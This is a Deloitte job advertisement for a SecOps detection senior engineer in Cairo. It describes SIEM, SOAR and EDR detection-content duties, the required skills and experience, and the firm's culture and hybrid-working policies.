Deloitte Global

Deloitte Innovation Hub I Cyber Security I SecOps Detection Senior Engineer, Cairo. Egypt

Connect to your career at Deloitte

Deloitte, established globally in 1845, is the world’s largest and leading professional services firm, providing Audit & Assurance, Tax & Legal and Consulting and related services to public and private clients spanning multiple industries.  Present in more than 150 countries, Deloitte is distinct in its ability to help clients solve their most complex problems, from strategy to implementation.

Deloitte innovation hub (DIH) is a strategic initiative/priority established by Deloitte North & South Europe (NSE) to support our ambition to become the leading business transformation partner of choice for our clients and to expand and scale our delivery footprint across EMEA. With access to a scaled, diverse, highly skilled, motivated, and engaged workforce, DIH is delivering complex technical solutions for clients’ most complex business problems, across Portfolios that include ‘Strategy & Transactions’, ‘Customer’, ‘Engineering, AI & Data, ‘Enterprise, Technology & Performance’ and ‘Cyber’. DIH is aiming to become the destination for top talents in Egypt for a long, exciting career. 

We invest in outstanding people of diverse talents and backgrounds and empower them to achieve more than they could elsewhere. Our work combines advice with action and integrity. We believe that when our clients and society are stronger, so are we. Our organization has grown in scale and diversity, providing services across the region, with our shared culture remaining the same. We aim to help clients realize their ambitions, make a positive difference in society, and maximize the success of our people. This drive fuels the commitment and humanity that run deep through our every action.

Connect to your opportunity

Responsible for configuring, maintaining, and supporting CSOC platforms, tools and logging infrastructure ensuring all systems fully operational and secure. Manage the development, customization and tuning of security content, including use cases, rules, and playbooks, to effectively detect and respond to cyber threats, ensuring detection logic and automation workflows align with CSOC priorities and cyber threat intelligence.

• Designing and build CSOC technologies such as SIEM, SOAR, EDR, and other platforms.
• Design and develop security content for, SIEM, SOAR and EDR
• Configure and maintain SIEM, SOAR, EDR, and other CSOC platforms.
• Build and manage logging infrastructure to ensure full telemetry coverage.
• Manage log source onboarding, parsing, normalization, data ingestion pipelines, and enrichment activities.
• Develop, test, and fine-tune detection rules, correlation logic, and alert conditions.
• Map and report detection coverage against frameworks (e.g., MITRE ATT&CK).
• Propose new detection ideas based on threat research and attack simulations.
• Build SOAR playbooks and automation scripts for alert enrichment and incident response.
• Translate threat intelligence, red team findings, and vulnerability data into use cases.
• Perform false-positive analysis and rule optimization to improve fidelity.
• Maintain a content repository with versioning, documentation, and lifecycle status.
• Work with threat monitoring and DFIR teams to validate use case effectiveness.
• Maintain system documentation, configuration baselines, and maintenance records.
• Monitor health and availability of all logging pipelines and tools.
• Conduct root-cause analysis of tool outages or data loss.

Connect to your skills and professional experience.

• Bachelor’s degree in Computer Engineering, Computer Science, Information Technology, or a related field.
• 3–6 years of experience in Cybersecurity Operations (CSOC), Detection Engineering, or Detection Content Development.
• Strong understanding of SOC architecture, security technologies, and log management, including ingestion, parsing, enrichment, correlation, and storage best practices.
• Hands-on experience with SIEM/SOAR platforms such as Splunk, ELK, LogRhythm, Microsoft Sentinel, Palo Alto XSIAM, or similar.
• Solid knowledge of network infrastructure, Linux/Windows administration, and system monitoring, with expertise in security telemetry (firewall, EDR, proxy, and other log sources).
• Proficiency in query and scripting languages (e.g., KQL, SPL, Sigma) for automation, detection tuning, and source validation.
• Familiarity with SOAR automation and orchestration tools (e.g., Cortex XSOAR, Sentinel Logic Apps, or Phantom) and experience designing scalable, reusable detection content.
• In-depth understanding of threat detection concepts, attacker behaviors, and MITRE ATT&CK mapping, including content gap analysis and threat model alignment.
• Strong analytical and troubleshooting skills with the ability to ensure high availability and reliability of security tooling.
• Knowledge of AI/ML concepts and their application in cybersecurity for detection and automation use cases.
  Good communication and coordination skills, with the ability to collaborate effectively across teams such as Threat Monitoring, CTI, and DFIR.
• Strong documentation and version control discipline (e.g., Git, Confluence) and attention to detection accuracy and operational impact.
• Understanding of data integrity, retention policies, and relevant regulatory/compliance standards.
• Relevant certifications in SIEM/SOAR/EDR platforms (e.g., Splunk, ELK, LogRhythm, Microsoft Sentinel, Palo Alto XSIAM, or equivalent) are preferred.

Connect to your service line – Technology and Transformation

Distinctive thinking, deep expertise, and collaborative working. That’s what connects us. That’s what makes us Deloitte. If you want to help solve some of the biggest challenges around, join us. Together, we’ll make an impact that matters.

Personal independence

Regulation and controls are standard practice in our industry and Deloitte is no exception. These controls provide important legal protection for both you and the firm. We are subject to several audit regulations, one of which requires that certain colleagues abide by specific personal independence constraints. This can mean that you and your "Immediate Family Members" are not permitted to hold certain financial interests (shares, funds, bonds etc.) with audit clients of the firm. The recruitment team will provide further detail as you progress through the recruitment process.

Connect to your Industry

“What attracted me to Deloitte were the endless opportunities and the collective experience of other like-minded individuals. Deloitte’s clients include many of the world’s largest organizations; I wanted to be part of a team that made a difference that I could be proud of.” Dan, T&T.

Connect with your colleagues

Location: Cairo. Egypt

Your Work, Your Way: We call our hybrid working vision Deloitte Works. And it does. We trust you to make the right choices around where, when, and how you work. You’ll be able to make decisions about how you work best, to be collaborative, learn from colleagues, share your experiences, build the relationships that will fuel your career and prioritize your wellbeing. Having great conversations with your team and your leadership paves the way for great collaborative ways of working.

Our commitment to you

Making an impact is more than just what we do: it’s why we’re here. So we work hard to create an environment where you can experience a purpose you believe in, the freedom to be you, and the capacity to go further than ever before.

We want you. The true you. Your own strengths, perspective, and personality. So, we’re nurturing a culture where everyone belongs, feels supported and heard, and is empowered to make a valuable, personal contribution. You can be sure we’ll take your wellbeing seriously, too. Because it’s only when you’re comfortable and at your best that you can make the kind of impact you, and we, live for.

Your expertise is our capability, so we’ll make sure it never stops growing. Whether it’s from the complex work you do, or the people you collaborate with, you’ll learn every day. Through world-class development, you’ll gain invaluable technical and personal skills. Whatever your level, you’ll learn how to lead.

Connect to your next step!

A career at Deloitte is an opportunity to develop in any direction you choose. Join us and you’ll experience a purpose you can believe in and an impact you can see. You’ll be free to bring your true self to work every day. And you’ll never stop growing, whatever your level.